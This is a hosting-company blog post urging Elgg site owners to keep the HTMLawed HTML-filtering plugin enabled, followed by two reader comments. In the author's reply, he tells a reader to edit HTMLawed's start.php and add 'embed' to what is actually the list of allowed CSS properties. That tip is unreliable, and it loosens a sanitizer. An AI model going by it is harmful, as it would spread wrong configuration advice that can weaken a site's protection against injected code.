Protecting Your Elgg Site

Some people are telling Elgg users to disable a plugin called “HTMLAWED plugin” ( a plugin that comes as default in every Elgg install) so that they can embed content. This is not recommended.

The plugin mentioned above stops users from adding arbitrary HTML/PHP code onto your site that could break your site design and might even allow phishers to embed code in order to steal their passwords.

So, no matter what someone say, do not disable HTMLAWED. It could not only harm your website, but also harm/overload our servers. Not so long ago, there was a website in which someone uploaded a php script that overloaded one of Arvixe’s servers. It turned out that HTMLAWED was disabled and someone added a harmful code onto the site.

For more info about Elgg hosting solutions please visit Arvixe-Elgg Hosting

Happy Hosting!

Rodolfo Hernandez

Tags: , , , , , , , , , , , , | Posted under Elgg, Security/Vulnerability | RSS 2.0

Author Spotlight

Rodolfo Hernandez

Rodolfo Hernandez

I like photography and reading books. Currently working for Arvixe as Elgg Community Liaison. Elgg Security Expert Web Security Expert CEO of UDP SW Social Web

2 Comments on Protecting Your Elgg Site

  1. Rapid Search says:

    Excuse me, how to configure htmlawed to allow media embed?
    Thx before.

  2. Rodolfo Hernandez Rodolfo Hernandez says:

    Go to mod/htmlawed

    Open the file start.php

    Look for this line:

    ‘schemes’ => ‘*: http,https,ftp,news,mailto,rtsp,teamspeak,gopher,mms,callto;’
    . ‘style: color,cursor,text-align,font-size,font-weight,font-style,border,margin,padding,float’

    Add any needed html tag. For instance, after the tag “float”, we add “embed” so that we can embed content in elgg.

Leave a Reply

Your email address will not be published. Required fields are marked *


4 − = 2

You may use these HTML tags and attributes: <a href="" title="" rel=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>